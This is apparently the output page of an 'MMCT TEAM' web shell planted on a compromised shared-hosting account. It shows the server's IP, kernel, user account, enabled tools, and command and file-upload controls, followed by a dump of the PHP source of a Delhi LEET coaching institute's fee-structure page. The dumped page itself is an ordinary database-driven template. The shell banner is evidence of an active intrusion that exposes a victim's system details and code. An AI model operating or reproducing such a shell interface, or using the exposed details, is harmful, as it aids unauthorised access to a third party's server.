MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.219.15.112
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/leetcoaching.co.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/leetcoaching.co.in/fees-structure.php
<!doctype html>
<html class="no-js" lang="zxx">

<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <?php include("top-link.php") ?>
    
    <title>Top Leet Coaching Institutes In Delhi</title>
    <meta name="description" content="we offer top-tier LEET coaching classes designed to help you excel in your exams. Our expert instructors provide comprehensive training, personalized support, and effective study materials to ensure you achieve your best performance.">
    </head>

<body>

    <?php include("header.php"); ?>

    <main>
        
        <div class="it-breadcrumb-area it-breadcrumb-bg" data-background="<?php echo $wspath;?>assets/img/breadcrumb/breadcrumb.jpg">
            <div class="container">
                <div class="row ">
                    <div class="col-md-12">
                        <div class="it-breadcrumb-content z-index-3 text-center">
                            <div class="it-breadcrumb-title-box">
                                <h1 class="it-breadcrumb-title">Fee Structure Of LEET Coaching</h1>
                            </div>
                            <div class="it-breadcrumb-list-wrap">
                                <div class="it-breadcrumb-list">
                                    <span><a href="<?php echo $wspath;?>">home</a></span>
                                    <span class="dvdr">//</span>
                                    <span>Study Material Of LEET Coaching</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
<div class="container" style="margin-top:50px;">
    <div class="row" style="margin: auto;
    padding-bottom: 20px;">
        <?php
            $sql = "SELECT * FROM `tbl_feestructure`
            INNER JOIN tbl_services ON tbl_feestructure.`course_id` = tbl_services.id";
            $run = mysqli_query($db,$sql) or die("Query Not run");
            while($data = mysqli_fetch_assoc($run)){
        ?>
        <div class="accordion" id="accordionExample" style="overflow-x: scroll;">
                <div class="accordion-item">
                  <h2 class="accordion-header" id="heading<?php echo $data['f_id'];?>">
                    <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse<?php echo $data['f_id'];?>" aria-expanded="true" aria-controls="collapse<?php echo $data['f_id'];?>">
                     <?php echo $data['name']?>
                    </button>
                  </h2>
                  <div id="collapse<?php echo $data['f_id'];?>" class="accordion-collapse collapse " aria-labelledby="heading<?php echo $data['f_id'];?>" data-bs-parent="#accordionExample">
                    <div class="accordion-body">
                      <?php echo $data['structure_desc'];?>
                    </div>
                  </div>
                </div>
  <?php } ?>
        </div>
    </div>
</div>
        </main>

    <?php include("footer.php"); ?>
</body>

</html>

MMCT - 2023